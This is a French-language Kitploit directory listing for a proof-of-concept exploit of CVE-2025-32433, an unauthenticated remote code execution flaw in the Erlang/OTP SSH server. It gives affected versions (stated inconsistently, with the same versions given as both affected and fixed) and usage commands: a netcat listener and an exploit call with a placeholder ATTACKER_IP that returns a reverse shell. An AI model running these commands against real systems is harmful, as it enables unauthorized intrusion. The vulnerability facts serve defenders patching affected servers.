Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE — PoC montrant une exécution de code à distance non authentifiée dans le serveur SSH Erlang/OTP. En exploitant une faille dans la gestion des messages du protocole SSH, un attaquant peut exécuter des commandes arbitraires sur la cible sans identifiants valides. | Kitploit
Outils/GitHubGitHub/dollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubdollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC montrant une exécution de code à distance non authentifiée dans le serveur SSH Erlang/OTP. En exploitant une faille dans la gestion des messages du protocole SSH, un attaquant peut exécuter des commandes arbitraires sur la cible sans identifiants valides.

Voir le dépôt
31il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-32433 - Erlang/OTP SSH RCE PoC

CVE-2025-32433

Aperçu

PoC montrant l'exécution de code à distance non authentifiée dans le serveur SSH Erlang/OTP.
En exploitant une faille dans le traitement des messages du protocole SSH, un attaquant peut exécuter des commandes arbitraires sur la cible sans informations d'identification valides.

  • CVE: CVE-2025-32433
  • Score CVSS : 10.0 (Critique)
  • Versions affectées :
    • OTP-27.3.3 et antérieures
    • OTP-26.2.5.11 et antérieures
    • OTP-25.3.2.20 et antérieures

Ce problème est corrigé dans les versions OTP-27.3.3, OTP-26.2.5.11 et OTP-25.3.2.20.

Références

  • Avis de Unit42
  • Dépôt du PoC
  • Entrée NVD

Utilisation

Configuration de l'écouteur :

root@kitploit:~
nc -lvnp 1234

alt text Exécution de l'exploit :

root@kitploit:~
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : IP cible
  • --rport : Port SSH cible
  • --lhost : Votre IP pour le reverse shell
  • --lport : Votre port d'écoute

alt text

alt text

Avertissement

Ce dépôt est à des fins pédagogiques uniquement. N'utilisez pas cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester. Une mauvaise utilisation peut être illégale et est strictement interdite.

Télécharger l’outil